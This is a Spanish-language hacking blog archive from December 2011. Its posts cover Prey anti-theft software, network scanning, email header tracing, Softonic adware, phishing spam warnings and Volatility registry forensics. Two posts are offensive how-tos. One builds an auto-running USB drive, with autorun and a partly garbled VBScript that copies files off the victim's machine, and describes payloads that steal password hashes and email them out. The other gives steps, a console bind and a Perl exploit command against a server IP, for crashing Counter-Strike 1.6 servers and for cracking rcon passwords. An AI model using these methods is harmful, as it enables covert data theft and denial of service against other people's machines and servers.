El lado oscuro de la internet: 2011

viernes, 23 de diciembre de 2011

Software antirobo para notebooks y móviles Android

Software antirobo para notebooks y móviles Android

Prey es un programa de código abierto que permite monitorear el equipo en caso de ser robado, es compatible con Windows, Linux, Mac y teléfonos móviles con Android.

El usuario cuenta con un panel de control online donde toda la información es almacenada, desde allí se puede configurar el programa y activar diferentes módulos de monitoreo. En caso de que el equipo sea robado bastaría con acceder a control.preyproject.com y reportarlo como desaparecido para que la información se empiece a recopilar.

Por ejemplo es posible tomar fotografías con la webcam, obtener capturas de pantalla, registrar IPs de conexión, activar la WiFi automáticamente para realizar una geolocalización, ver programas en ejecución, archivos modificados, entre otras cosas… todo de forma oculta para que el ladrón no sepa que está siendo monitoreado.

En la siguiente imagen se puede ver parte del panel online con los módulos:

En este caso están activos el módulo “Webcam” que toma fotografías automáticamente y el de “Geolocalización” que utiliza el GPS interno o una triangulación WiFi , la ubicación de la máquina se muestra en Google Maps.

El programa también permite desplegar mensajes de alerta y bloquear el equipo, estas funcionalidades no me parecen tan útiles ya que el ladrón podría apagar la máquina o directamente formatearla, es mejor que la utilice lo suficiente para recopilar la mayor cantidad de información posible (fotos, capturas de pantalla, IPs, ubicaciones, etc), en todo caso luego de identificarlo se podrían activar estas funciones para evitar que siga navegando por nuestros archivos o al menos complicarle un poco el acceso.

Otra función interesante es que permite borrar cookies y passwords almacenados en el navegador, de esta forma en caso de tener sesiones activas o logueos automáticos no podrían acceder a nuestras cuentas.

Instalando el cliente en Ubuntu y configurando reportes cada 5 minutos con autoconexión de WiFi, muy sencillo:

Captura del panel desde el cual se activa el programa (se marca como desaparecido), en el caso de ser un móvil se envía un SMS:

Si bien la aplicación es de código abierto, el panel de administración es un servicio aparte, lo bueno es que también es gratuito y permite monitorear hasta 3 equipos con reportes que se generan cada 5 minutos. La versión Pro no tiene esta limitación y ofrece más funcionalidades.

Con Prey de cierta forma estamos troyanizando el equipo con un backdoor controlado, nada impediría que sea instalado en equipos ajenos, pero esa obviamente no es la idea del programa

Descarga http://preyproject.com/es/

fuente: spamloco
Saludos

miércoles, 21 de diciembre de 2011

Cómo crear un USB Drive (Pendrive) Auto-Hacking

Bueno, primero les pongo un texto introductorio a los "Ataques USB con tecnología U3" y luego un video de como crear un buen Pendrive (USB Drive) para comprometer el sistema mediante un autorun.inf.

Ataques USB con tecnología U3

Introducción

A continuación se describen los diversos ataques que se pueden llevar a cabo mediante dispositivos de almacenamiento USB U3. Estos ataques consisten en la mayoría de casos, en el robo de información del ordenador donde se conecta el dispositivo USB, pero también es posible la instalación de puertas traseras con la finalidad de tomar un mayor control sobre el ordenador.

La vulnerabilidad

El ataque es posible realizarlo debido a la opción Autorun que hasta Windows XP SP3 permanecía activada por defecto. Dicha opción habilita al Sistema Operativo a ejecutar sentencias y programas automáticamente una vez se ha introducido el CD/DVD en el ordenador. El Sistema Operativo lee el fichero Autorun.inf contenido en el directorio raíz del CD/DVD donde se especifica qué ejecutar. De esta manera, por ejemplo, sería posible instalar programas que registren las pulsaciones introducidas en el ordenador y posteriormente enviarlas por correo electrónico.

El ataque

Los dispositivos con tecnología U3 contienen una partición que simula ser una unidad de CD-ROM virtual. Este tipo de dispositivos permiten la ejecución de programas directamente desde el dispositivo, sin necesidad de instalación en el equipo al que se conecta. Así pues, además de contener la unidad de CD-ROM virtual que normalmente suele ser bastante pequeña en tamaño, contiene una partición mayor donde se almacenan las aplicaciones a ejecutar.

Dicho esto, la característica que se va a aprovechar es la de auto ejecución al insertar un CD-ROM, que en nuestro caso se tratará del dispositivo USB con la unidad virtual. Como se ha explicado antes, esta opción se encuentra activada por defecto en las versiones del Sistema Operativo Windows anteriores a la versión XP SP2 y permite la ejecución de las sentencias que se especifiquen en el fichero Autorun.inf, cosa que hará innecesaria la actuación del usuario para la ejecución de cualquier sentencia o programa en el equipo.

Herramientas disponibles

Para llevar a cabo el ataque, lo primero que se debe hacer es modificar el contenido de la unidad de CD-ROM virtual con la finalidad de que ejecute lo que nosotros queramos. Esto se puede llevar a cabo mediante una serie de herramientas disponibles las cuales se describirán a continuación:

- Universal U3 LaunchPad Hacker: Esta herramienta nos permite reemplazar el contenido de la unidad de CD-ROM virtual por una imagen ISO personalizada por nosotros con aplicaciones destinadas al Slurping o robo de información. Cabe destacar que en la otra partición del disco duro, en la que es posible la escritura, se crea de manera oculta un directorio con los datos del programa.

- SwitchBlade: Utiliza herramientas conocidas como pwdump, mailpassview entre otras para el robo de información.

Una vez es conectado el dispositivo USB a un equipo típico con Windows XP SP2 o anterior, en aproximadamente 30 segundos el programa habrá copiado al dispositivo datos sensibles del sistema como por ejemplo claves de registro de productos de Microsoft, lista de parches de seguridad instalados, hashes de contraseñas SAM, contraseñas almacenadas en la caché del equipo, contraseñas almacenadas en navegadores web, historial de navegación, etc.

- Hacksaw: Este payload es similar al anterior pero añade algunas funciones más interesantes como:

a) Instala en el sistema un programa que se inicia automáticamente al iniciar el Sistema Operativo el cual se encarga de recopilar datos sensibles como contraseñas, caché, historiales, etc., comprimirla y enviarla a un dirección de correo electrónico configurada por el atacante.

b) Instala una herramienta de escritorio remoto llamada VNC, que permite al atacante administrar remotamente el equipo.

c) Ejecuta un escaneo de la red local a la que el equipo está conectado obteniendo un mapa de red que se enviará por correo electrónico al atacante.

[Video] Como crear un USB Drive (Pendrive) Auto-Hacking

http://www.youtube.com/watch?v=lFlgddjOPpw&feature=player_embedded

This video will show you how to make an auto-hacking USB drive and how to protect yourself from them.

U3 Universal customizer - http://www.u3community.com/viewtopic.php?t=434
Batch to exe converter - http://download.cnet.com/Bat-To-Exe-Converter/3000-2069_4-10555897.html
Nirsoft Utilities - http://www.nirsoft.net

AUTORUN SCRIPT:

[Autorun] open=launch.exe -a

LAUNCH.BAT SCRIPT:

usb.vbs

USB.VBS SCRIPT:

Dim oFSO, oDrive, objFolder, oDestination, shell
 Const USBDRIVE=1
 oDestination = “c:test”
set oFSO = Wscript.CreateObject(“Scripting.FileSystemObject”)
 Set shell=createobject(“wscript.shell”)
 For Each oDrive in oFSO.Drives
If oDrive.DriveType = USBDRIVE And oDrive.DriveLetter <> “A”  Then
shell.run oDrive.DriveLetter & “:batch.bat”
 set shell=nothing
 End If
Next
 Sub CopyFiles(oPath, oDst)
 Set objFolder = oFSO.GetFolder(oPath)
For Each Files In objFolder.
Files WScript.Echo “Copying File”,
Files newDst=oDst&”"&Files.Name oFSO.CopyFile
Files,newDst,True WScript.Echo Err.Description
 Next
End Sub

martes, 20 de diciembre de 2011

Fing: Analizar redes android

Cuándo hablamos de escáner de red, es inevitable que se nos venga a la cabeza la palabra Nmap. Es bastante lógico, ya que es una herramienta de código abierto para exploración de red y auditoría de seguridad preferida por todos los expertos en seguridad.

Si bien existe esa herramienta para Android, aunque hay que seguir algunos pasos para instalarla, hay una muy buena alternativa a ella y se llama Fing. Esta aplicación está disponible en el Android Market (https://market.android.com/details?id=com.overlook.android.fing) y es totalmente gratuita.

La misma es una excelente aplicación que permite hacer un escaneo completo de la red a la que esté conectado el terminal en ese momento, obteniendo toda la información posible de ella.

Es menester aclarar que Fing no sacará la clave WEP/WPA de la red, sino que sólo se limita a ofrecer información útil sobre la red.

Algunas de las cosas que se pueden hacer son las siguientes:

Ping: Permite hacer pings a otros dispositivos desde el móvil.
Descubrimiento de red: Mostrará todos los equipos conectados a esa red.
Escaneo de servicios: Muestra los servicios que tiene activos cada equipo.
Traceroute: Ofrece la ruta por la que pasa en internet desde el dispositivo hasta una determinada dirección de internet.
DNS Lookup: Descubrimiento de DNS.
Wake on LAN: Iniciar (despertar) a un equipo de la red el cual se encuentre apagado.
TCP Conection tester: Probar la conexión TCP.
MAC Address: Muestra direcciones MACs de los equipos.
Permite dar nombre a un equipo, e incluso muestra iconos en función de que tipo de dispositivo es.
Detección de conexión.
Opciones de geolocalización.
Integración con aplicaciones de red de terceros: SSH, Telnet, FTP, FTPS, SFTP, SCP, HTTP, HTTPS, SAMBA

Una vez activado el WiFi, esta aplicación escaneará toda la red y mostrará una pantalla con los distintos hosts para analizar, además de su velocidad de conexión, IPs públicas y privadas y DNSs.

En la imagen anterior se puede ver que la MAC address está oculta. Este programa permite hacerlo automáticamente activando el Privacy Mode.

Al tocar sobre un host aparecerá un menú de opciones para realizar. Se podrá ver que se le puede asignar un icono personalizado a cada host, escanear sus servicios, hacerle ping, etc.

Fingtrae una lista de servicios predefinidos que son los que usa cuando se realiza un escaneo de puertos a cada host. Se puede editar esta lista, añadirle servicios o quitarlos.

Una vez detectado cada puerto accesible, el programa mostrará otro menú de opciones en el que, si hay clientes para los servicios que se ofrecen, se puede conectar directamente: VNC, carpetas compartidas, FTP, SSH, servidores web, etc.

Además, Fing tiene otras herramientas como Traceroute (para ver los saltos que hay que dar hasta llegar a un host) y Look up DNS para averiguar IPs a partir de nombres DNS o viceversa. También permite exportar/importar información en formato xml y hacer backup de la configuración.

Esta es una herramienta genial cuando se necesita controlar cualquier aspecto de la red. Además, no existen muchas aplicaciones gratuitas con 5 estrellas completas, señal de que es un programa fiable.

iBench: ¿Qué rendimiento da tu Mac para el cracking?

En este post no vamos a hablar de seguridad como tal, sino de rendimiento, aunque como bien dice el título del artículo, este rendimiento es bueno para, enter otras coas, el cracking de hashes, tan necesario en algunas fases de la auditoría de sistemas.

En esta ocasión vamos a hablar de iBench, una curiosa utilidad de benchmarking - es decir, de test de rendimiento - especialmente creada para equipos Apple.

iBench fue creado por los investigadores Tyler Harter, Chris Dragga, Michael Vaughn, Andrea C. Arpaci-Dusseau y Remzi H. Arpaci-Dusseau del Departamento de Ciencias de la Computación de la Universidad de Wisconsin, y publicado en sus paper "A File is Not a File: Understanding the I/O Behavior of Apple Desktop Applications" en el que explican por qué se ha creado iBench.

Este conjunto de pruebas, tal y como ellos mismos exponen, han sido creadas basándose en las actividades que los equipos de hoy en día deben realizar, haciendo pruebas intensivas en cómputo, pruebas intensivas en transferencia de memoria, y análisis de datos. Así, realizan pruebas como el cálculo de fractales, el cálculo de hashes MD5 o la compresión JPEG o ZIP para evaluar el rendimiento del sistema.

Figura 1: Ejecutar tests de iBench en un MacBook Air

La herramienta es totalmente gratuita y se puede descargar desde Descargar iBench. Una vez instalada, el funcionamento es bastante sencillo. Es suficiente con lanzar el programa y ejecutar los tests.

Figura 2: Test de transformación de Householder

Una a una las pruebas irán apareciendo por pantalla, ejecutándose de forma aleatoria para evitar que la prueba quede contaminada por una ejecución anterior.

Figura 3: Una de los tests, basado en cálculo de hashes MD5

Al finallizar las últimas pruebas, el sistema informará de la nota obtenida. En este caso no demasiado alta.

Figura 4: Resultado de iBench

¿Qué significan los resultados?

Los resultados de iBench represtan el rendimiento de este Mac en relación a un resultado base. Este resultado base se calcula de forma abstracta y no representa ningún modelo en concreto, aunque podría decirse que un PowerPC G4 dual de 1 GHz sería lo más representativo.

En cualquier caso, y como este ejemplo, un resultado de 2,65 representa que este Mac es 2,65 veces más rápido que el resultado base. Prueba el tuyo.

domingo, 18 de diciembre de 2011

Ver la IP de un correo recibido

Hoy me preguntaron cuál es el servicio de Email Tracking que había utilizado en el post sobre el estafador nigeriano, para contestar aprovecho el tema y publico un mini post

Todos los correos que recibimos tienen una sección conocida como encabezado, cabecera o header, allí se incluye información sobre el mensaje como quién lo envía, la fecha, el camino recorrido hasta nuestra bandeja de entrada, IPs, etc. Parte de esta información siempre la vemos y otra está oculta, pero se puede visualizar fácilmente.

En Hotmail y Gmail, por ejemplo, hay que hacer clic en el menú Responder y seleccionar “Ver código fuente del mensaje” y “Mostrar original“, respectivamente:

En ambos casos se abrirá una nueva pestaña o página con la información del encabezado que será todo lo que esté por encima del contenido mismo del mensaje:

Ejemplo de un encabezado

Si bien interpretar esta información no es complicado, puede resultar confusa, por eso existen algunas herramientas online que permiten hacerlo de forma rápida y sencilla con un clic, simplemente se debe copiar y pegar el encabezado.

Email Trace – Email Tracking de ip-adress.com [enlace]:

Se copia el encabezado y se hace clic en el botón “Trace Email Sender”, el resultado será la IP del remitente, el país y su ubicación aproximada en Google Maps.

SpamLocator de geobytes.com [enlace]:

(clic para ver más grande)

Se hace lo mismo, el resultado será la IP del remitente, país y camino recorrido (servidores). En este ejemplo se puede ver que el mensaje partió desde Nigeria, pasó por Estados Unidos y finalmente llegó a mi país (aunque la IP de Uruguay no la obtiene del encabezado, sino de mi ubicación actual donde se supone que abro el correo).

El pasaje por Estados Unidos se debió a que el remitente utilizó una cuenta basada en Hotmail, para obtener información sobre las IPs podemos utilizar whois.domaintools.com:

Esta IP pertenece a Microsoft

Hay que tener en cuenta que no siempre es posible ver la IP de la persona que envía el correo, en algunos casos sólo vemos la IP del servicio utilizado. Esto sucede, por ejemplo, cuando el mensaje es enviado desde Gmail… lo que vemos como origen es una IP de Google en Estados Unidos.

Los encabezados de un correo falso pueden ser muy interesantes, no sólo porque se pueden ver IPs, sino porque a veces se pueden encontrar datos que revelan información personal de los atacante

Antivirus comienzan a detectar el Softonic Downloader

A principios de año publiqué un post sobre las descargas de Softonic y el software extra que le ofrecen a sus usuarios durante la instalación de los programas, hace poco volví a tocar el tema en un post sobre programas falsos que modificaban las páginas de inicio y hoy vuelvo a mencionarlo porque noté que los antivirus están comenzando a detectar al instalador como una posible amenaza.

En la siguiente captura se puede ver el resultado de VirusTotal para uno de los programas más descargados de Softonic, el Ares:

Instalador de Softonic en VirusTotal

Como se puede apreciar, algunos antivirus lo detectan como una amenaza y también lo identifican como “SoftonicDownloader”. Esto sucede porque el instalador también puede descargar software extra que en la mayoría de los casos son barritas para el navegador.

Estas barritas cuentan con un certificado de TRUSTe y se supone que no son dañinas para el equipo, sin embargo algunas como la que comento a continuación, incluyen publicidad no deseada.

Cabe aclarar que el instalador fue creado como un servicio para garantizar la descarga de los programas, pues cuando no están disponibles en la fuente oficial se descargan desde los servidores de Softonic. Es un servicio gratuito que tiene sus costos, por lo tanto es entendible que incluya publicidad, pero hay cierto “nivel de publicidad” que se podría mantener para no ensuciar el trabajo que realizan en el resto del sitio.

Esto es lo que ofrece y recomienda instalar Softonic con el Ares:

Barra ofrecida por el instalador

Y el resultado en el navegador es el siguiente:

Barra instalada y página de inicio modificada

Una página de inicio modificada con publicidad y banners que engañan a los usuarios, en este caso con la estafa de las encuestas. Al hacer clic se termina en una página como la siguiente:

Portal falso que simula ser una noticia

La propia barrita instalada también tiene publicidad engañosa con mensajes que dicen cosas como “Tienes mensajes nuevos” o “Te ganaste un iPhone”, cuando les hice clic terminé en páginas de suscripción por SMS:

Publicidad engañosa en la barra

Destino de la publicidad en la barra

Otra variante de publicidad engañosa y suscripción SMS

Es cierto que lo que haga la barrita luego de estar instalada no es responsabilidad de Softonic y puede ser algo difícil de controlar, pero no está bueno que esto se instale en las computadoras porque realmente es molesto, invasivo y al final sólo termina generando problemas. Por otro lado el mismo Softonic Downloader también tiene publicidad de este tipo, en la siguiente captura se puede ver un banner que aparece dentro del programa:

Publicidad en el instalador de Softonic

Al hacerle clic terminé en un sitio para suscribirse por SMS (nada que ver a lo que decía el banner):

Destino de la publicidad en el instalador

Pienso que hay varias cosas que Softonic debería de cambiar, comenzando por las opciones de instalación, no deberían de estar marcadas por defecto, eso es engatusar al usuario que no sabe lo que hace e instala todo como viene. También podrían mostrar publicidad más seria dentro de su propio programa y no ofrecer barritas como la que comento en este post.

El caso Download.com:

Este es otro sitio muy conocido de descargas que desde hace algunos meses también ofrece programas por medio de un instalador propio, a diferencia del de Softonic no incluye banners ni opciones marcadas por defecto, es el usuario el que decide si aceptar o no la instalación del software extra:

Instalador de Download.com

Sin embargo como se puede ver en la captura hay un par de detalles engatusadores, en este paso del asistente la mayoría de los usuarios seguramente presionen el botón verde de aceptar porque ese es el que se presiona durante el resto de la instalación, además el botón rojo “Decline” a primera vista da la sensación de cancelar todo el proceso del asistente y no sólo la instalación de la toolbar, es decir que por inercia muchos podrían terminar presionando el botón de Aceptar.

Son pequeños detalles que al final del día terminan marcando una gran diferencia en cuanto a conversiones, ya que generalmente si no hay ningún otro acuerdo especial, por cada toolbar que se instala el distribuidor gana dinero. No puedo evitar pensar que estas prácticas son el resultado de la naturaleza humana de querer siempre más y no algo necesario para cubrir costos.

Recientemente este instalador de Download.com fue el centro de las críticas porque al creador de un programa muy conocido llamado Nmap, no le gustó nada que su software se ofreciera de esta forma. Por un lado no se estaban respetando sus políticas de distribución y por otro se detectó software no deseado en la aplicación. Puedes leer la noticia completa con todos los detalles en Security by Default.

Actualización: buena señal

El post llegó a Softonic y dieron una respuesta sobre el asunto, se puede leer en este twitt y en los comentarios del post. Van a revisar las campañas que tienen activas y bloquear aquellas que no se ajusten a sus políticas.

“Estas invitado a nuestra boda” invitación falsa con troyano

Spam de farmacias en mensajes falsos de LinkedIn

16 diciembre, 2011 Deja un comentario

Están circulando correos falsos que simulan ser mensajes enviados por LinkedIn, como se puede apreciar en la siguiente captura los enlaces apuntan hacia una página extraña, al acceder se carga un script que redirecciona hacia una farmacia online fraudulenta:

Esta clase de spam es bastante habitual y hay muchas variantes como mensajes que simulan ser enviados por Twitter, YouTube, Facebook, etc. En el blog he comentado varios casos y todos tienen la particularidad de enlazar a páginas intermediarias que se suben a servidores vulnerados, esta técnica es utilizada para burlar los filtros antispam ya que los dominios de las farmacias falsas suelen ser detectados y bloqueados con mayor facilidad.

Si bien no es un ataque peligroso para el equipo, lo puede ser para nuestra salud o bolsillo si nos vemos tentados por las ofertas farmacéuticas. Pero más allá de eso, siempre hay que tener cuidado con los enlaces y no dejarse llevar por las apariencias, hace algún tiempo se detectó una gran campaña de spam con correos falsos de LinkedIn, al hacer clic las víctimas veían una página en blanco y luego eran redireccionadas a google.com, muchos pensaron que se trataba de algún error pero en ese ínterin se los atacaba con diversos exploits.

Gracias José por el envío.

Ver también:
WordPress desactualizados utilizados en campañas de spam farmacéutico.

“Estas invitado a nuestra boda” invitación falsa con troyano

15 diciembre, 2011 4 comentarios

En estas fechas comienzan a circular las tarjetas navideñas con saludos y buenos deseados, también es cuando las infecciones se disparan producto de las tarjetas virtuales fraudulentas que envían los spammers. Pero no sólo la navidad es el gancho para engañar, en la siguiente captura se puede ver una invitación falsa que está circulando desde hace algunas horas por correo:

invitacion-boda

Bajo el asunto “Estas invitado a nuestra boda” se busca que las víctimas descarguen un archivo que supuestamente sería la invitación. Al hacer clic se inicia la descarga de un archivo ejecutable InvitacionPersonal.pe.exe que en realidad es un troyano (VT 6/43):

invitacion-bodas-exe

Como muchas veces he comentado, es un ataque sencillo pero efectivo porque muchos usuarios desconocen el peligro que representa descargar archivos no solicitados y de fuentes desconocidas, sobre todo cuando se trata de archivos con extensión .exe. En este caso además juegan con la curiosidad de las víctimas, pues el mensaje no aclara quiénes son los novios para aumentar la tentación a la descarga.

No se dejen engañar de forma tan sencilla!

Spam de farmacias en mensajes falsos de LinkedIn

16 diciembre, 2011 Deja un comentario

sábado, 17 de diciembre de 2011

Tirar server CS 1.6

Ok voy a mencionar algunos de los métodos más utilizados aquí, realmente depende de que el servidor está instalado, ya sea steam o no steam, etc , el método a tratar es para novatos

1)Bindeo de teclas

Citar

Abrimos consola y ponemos bind "mwheelup" "dump_entity_sizes;dump_entity_sizes;dump_entity_sizes;dump_entity_sizes;dump_ent ity_sizes;dump_entity_sizes;dump_entity_sizes;dump_entity_sizes;dump_entity_siz e s;dump_entity_sizes;dump_entity_sizes;dump_entity_sizes;dump_entity_sizes;dump _e ntity_sizes;dump_entity_sizes;dump_entity_sizes;dump_entity_sizes;dump_entity _sizes;dump_entity_sizes;dump_entity_sizes"

A) Ahora entra al servidor. Y desplaza la rueda del ratón arriba tanto como pueda

2)Método Perl Exploit
Descargamos Pearl: Pearl

A) instalar Perl en la carpeta C: / Perl.
A continuación, descargue el cs.pl y copie el archivo cs.pl en C: / Perl / bin
http://rapidshare.com/files/106825228/cs.pl-Crazy-Coderz.net.rar

b) Ir a inicio -ejecutar -cmd y tipear

Código:

cd c:/Perl/bin

a continuación, escribir Perl cs.pl
Ejemplo: Perl cs.pl 80.60.250.20:27015
esperar la respuesta. . . . y el server estara caido !

3) Spamming
http://www.youtube.com/watch?v=cllqFspyNTY&feature=player_embedded

4) Rcon crack Método
¿Sabía usted puede controlar un servidor de counter con la contraseña rcon.
Es posible encontrar la contraseña Rcon. Sí, hay una herramienta que se utiliza para crackear la contraseña Rcon el mismo método que romper cualquier sitio de hosting . Simplemente por la carga de un nombre de usuario y contraseña. Así que lo que hace es enviar una varias consultas al servidor y hace que el servidor tenga lag.
Si tiene suerte, usted realmente puede crackearla la contraseña
No vamos a explicar cómo hacerlo aquí ...
http://www.fileserve.com/file/NMmdMXs
De nuevo, esto depende de la versión de HL.

Caminos del Registro de Windows (_CMHIVE)

Hace poco me ayudó a conseguir la materia de registro de trabajo en otras imágenes de XP para la volatility 1.4.

En XP tenemos la siguiente estructura de una sección del Registro :

Código:

'_CMHIVE' : [ 0x49c, {
   'Hive' : [ 0x0, ['_HHIVE']],
   'FileHandles' : [ 0x210, ['array', 3, ['pointer', ['void']]]],
   'NotifyList' : [ 0x21c, ['_LIST_ENTRY']],
   'HiveList' : [ 0x224, ['_LIST_ENTRY']],
   'HiveLock' : [ 0x22c, ['pointer', ['_FAST_MUTEX']]],
   'ViewLock' : [ 0x230, ['pointer', ['_FAST_MUTEX']]],
   'LRUViewListHead' : [ 0x234, ['_LIST_ENTRY']],
   'PinViewListHead' : [ 0x23c, ['_LIST_ENTRY']],
   'FileObject' : [ 0x244, ['pointer', ['_FILE_OBJECT']]],
   'FileFullPath' : [ 0x248, ['_UNICODE_STRING']],
   'FileUserName' : [ 0x250, ['_UNICODE_STRING']],
   'MappedViews' : [ 0x258, ['unsigned short']],
   'PinnedViews' : [ 0x25a, ['unsigned short']],
   'UseCount' : [ 0x25c, ['unsigned long']],
   'SecurityCount' : [ 0x260, ['unsigned long']],
   'SecurityCacheSize' : [ 0x264, ['unsigned long']],
   'SecurityHitHint' : [ 0x268, ['long']],
   'SecurityCache' : [ 0x26c, ['pointer', ['_CM_KEY_SECURITY_CACHE_ENTRY']]],
   'SecurityHash' : [ 0x270, ['array', 64, ['_LIST_ENTRY']]],
   'UnloadEvent' : [ 0x470, ['pointer', ['_KEVENT']]],
   'RootKcb' : [ 0x474, ['pointer', ['_CM_KEY_CONTROL_BLOCK']]],
   'Frozen' : [ 0x478, ['unsigned char']],
   'UnloadWorkItem' : [ 0x47c, ['pointer', ['_WORK_QUEUE_ITEM']]],
   'GrowOnlyMode' : [ 0x480, ['unsigned char']],
   'GrowOffset' : [ 0x484, ['unsigned long']],
   'KcbConvertListHead' : [ 0x488, ['_LIST_ENTRY']],
   'KnodeConvertListHead' : [ 0x490, ['_LIST_ENTRY']],
   'CellRemapArray' : [ 0x498, ['pointer', ['_CM_CELL_REMAP_BLOCK']]],
} ],

Cuando se ejecuta el comando hivelist de volatility en un XP o Windows 2003 , el nombre delregistro se obtiene a partir de la entrada FileFullPath. Esto es más de un nombre genérico con el prefijo "\ Device \ HarddiskVolume1". También hay una entrada en FileUserName _CMHIVE, que puede contener el verdadero camino a la rama del registro. Aquí están algunos ejemplos:

Código: [Seleccionar]

************************************************************************
FileFullPath: \Device\HarddiskVolume1\WINDOWS\system32\config\SECURITY
FileUserName: \SystemRoot\System32\Config\SECURITY
************************************************************************
FileFullPath: \Device\HarddiskVolume1\WINDOWS\system32\config\software
FileUserName: \SystemRoot\System32\Config\SOFTWARE
************************************************************************
FileFullPath: \Device\HarddiskVolume1\Documents and Settings\NetworkService\NTUSER.DAT
FileUserName: \??\C:\Documents and Settings\NetworkService\ntuser.dat
************************************************************************

Como ya he dicho, tenemos los mismos resultados para Windows 2003 .

A partir de Windows Vista, tenemos a un miembro adicional en _CMHIVE , HiveRootPath nombre que contiene un nombre de registro de partida, ya sea con (\REGISTRY\MACHINE or \REGISTRY\USER). Aquí podemos ver el resultado de un plugin hivelist modificados, cada colmena se separan mediante asteriscos:

Código:

FileFullPath:
FileUserName:
HiveRootPath: \REGISTRY\MACHINE\HARDWARE
************************************************************************
FileFullPath: \Device\HarddiskVolume1\Windows\System32\SMI\Store\Machine\SCHEMA.DAT
FileUserName: \??\C:\Windows\System32\SMI\Store\Machine\SCHEMA.DAT
HiveRootPath: \registry\machine\Schema
************************************************************************
FileFullPath: \Device\HarddiskVolume1\Windows\System32\config\SOFTWARE
FileUserName: \SystemRoot\System32\Config\SOFTWARE
HiveRootPath: \REGISTRY\MACHINE\SOFTWARE
************************************************************************
FileFullPath: \Device\HarddiskVolume1\Windows\System32\config\DEFAULT
FileUserName: \SystemRoot\System32\Config\DEFAULT
HiveRootPath: \REGISTRY\USER\.DEFAULT
************************************************************************
FileFullPath: \Device\HarddiskVolume1\Windows\System32\config\SAM
FileUserName: \SystemRoot\System32\Config\SAM
HiveRootPath: \REGISTRY\MACHINE\SAM
************************************************************************
FileFullPath: \Device\HarddiskVolume1\Windows\System32\config\SECURITY
FileUserName: \SystemRoot\System32\Config\SECURITY
HiveRootPath: \REGISTRY\MACHINE\SECURITY
************************************************************************
FileFullPath: \Device\HarddiskVolume1\Windows\System32\config\COMPONENTS
FileUserName: \SystemRoot\System32\Config\COMPONENTS
HiveRootPath: \REGISTRY\MACHINE\COMPONENTS
************************************************************************
FileFullPath: \Device\HarddiskVolume1\Boot\BCD
FileUserName: \Device\HarddiskVolume1\Boot\BCD
HiveRootPath: \REGISTRY\MACHINE\BCD00000000
************************************************************************
FileFullPath: \Device\HarddiskVolume1\Windows\ServiceProfiles\NetworkService\NTUSER.DAT
FileUserName:
HiveRootPath: \REGISTRY\USER\S-1-5-20
************************************************************************
FileFullPath: \Device\HarddiskVolume1\Windows\ServiceProfiles\LocalService\NTUSER.DAT
FileUserName: \??\C:\Windows\ServiceProfiles\LocalService\ntuser.dat
HiveRootPath: \REGISTRY\USER\S-1-5-19
************************************************************************
FileFullPath: \Device\HarddiskVolume1\Users\user\NTUSER.DAT
FileUserName: \??\C:\Users\user\ntuser.dat
HiveRootPath: \Registry\User\S-1-5-21-3861645159-1226237480-2911178601-1000
************************************************************************
FileFullPath: \Device\HarddiskVolume1\Users\user\AppData\Local\Microsoft\Windows\UsrClass.dat
FileUserName: \??\C:\Users\user\AppData\Local\Microsoft\Windows\UsrClass.dat
HiveRootPath: \Registry\User\S-1-5-21-3861645159-1226237480-2911178601-1000_Classes
************************************************************************
FileFullPath:
FileUserName:
HiveRootPath: \REGISTRY\MACHINE\SYSTEM
************************************************************************

Se puede ver que hay un par de registros que sólo tienen\REGISTRY\MACHINE\SYSTEM and \REGISTRY\MACHINE\HARDWARE). \REGISTRY\MACHINE\HARDWARE es un volatil que contiene información sobre el hardware durante el arranque, vamos a explorar esta clave un poco más tarde ... Se obtiene el mismo resultado para todos los Service Packs de Windows Vista, así como Windows 2008 (que está estrechamente relacionado con Vista SP1 / 2).

Para Windows 7 se obtienen resultados ligeramente diferentes. A pesar de que FileFullPath se define en _CMHIVE para Windows 7, no parece que se utilizará en todos:

Código: [

FileFullPath:
FileUserName: \SystemRoot\System32\Config\SECURITY
HiveRootPath: \REGISTRY\MACHINE\SECURITY
************************************************************************
FileFullPath:
FileUserName: \??\C:\System Volume Information\Syscache.hve
HiveRootPath: \REGISTRY\A\{43bcec53-795b-11df-9d3d-000c29bf81c3}
************************************************************************
FileFullPath:
FileUserName:
HiveRootPath: \REGISTRY\MACHINE\SYSTEM
************************************************************************
FileFullPath:
FileUserName:
HiveRootPath: \REGISTRY\MACHINE\HARDWARE
************************************************************************
FileFullPath:
FileUserName: \SystemRoot\System32\Config\DEFAULT
HiveRootPath: \REGISTRY\USER\.DEFAULT
************************************************************************
FileFullPath:
FileUserName:
HiveRootPath: \REGISTRY\USER\S-1-5-20
************************************************************************
FileFullPath:
FileUserName: \??\C:\Windows\ServiceProfiles\LocalService\NTUSER.DAT
HiveRootPath: \REGISTRY\USER\S-1-5-19
************************************************************************
FileFullPath:
FileUserName: \Device\HarddiskVolume1\Boot\BCD
HiveRootPath: \REGISTRY\MACHINE\BCD00000000
************************************************************************
FileFullPath:
FileUserName: \SystemRoot\System32\Config\SOFTWARE
HiveRootPath: \REGISTRY\MACHINE\SOFTWARE
************************************************************************
FileFullPath:
FileUserName: \??\C:\Users\user\ntuser.dat
HiveRootPath: \Registry\User\S-1-5-21-1665533257-296859758-874228692-1000
************************************************************************
FileFullPath:
FileUserName: \??\C:\Users\user\AppData\Local\Microsoft\Windows\UsrClass.dat
HiveRootPath: \Registry\User\S-1-5-21-1665533257-296859758-874228692-1000_Classes
************************************************************************
FileFullPath:
FileUserName: \SystemRoot\System32\Config\SAM
HiveRootPath: \REGISTRY\MACHINE\SAM
************************************************************************

Por lo tanto en Windows 7 la producción de hivelist, verá caminos FileUserName cuando se definen las rutas o HiveRootPath si no lo son:

Código:

Virtual     Physical    Name
0x963e39d0  0x1d41a9d0  \SystemRoot\System32\Config\SECURITY
0xa057a7a8  0x3518e7a8  \??\C:\System Volume Information\Syscache.hve
0x82ba6140  0x02ba6140  [no name]
0x87a0c008  0x28027008  [no name]
0x87a1c008  0x27fb5008  \REGISTRY\MACHINE\SYSTEM
0x87a429d0  0x27f9d9d0  \REGISTRY\MACHINE\HARDWARE
0x87abc898  0x1fd97898  \SystemRoot\System32\Config\DEFAULT
0x8849e008  0x27dc0008  \REGISTRY\USER\S-1-5-20
0x88521008  0x1be07008  \??\C:\Windows\ServiceProfiles\LocalService\NTUSER.DAT
0x8bb309d0  0x25bac9d0  \Device\HarddiskVolume1\Boot\BCD
0x8bb328d8  0x25bb58d8  \SystemRoot\System32\Config\SOFTWARE
0x91a9a9d0  0x1787c9d0  \??\C:\Users\user\ntuser.dat
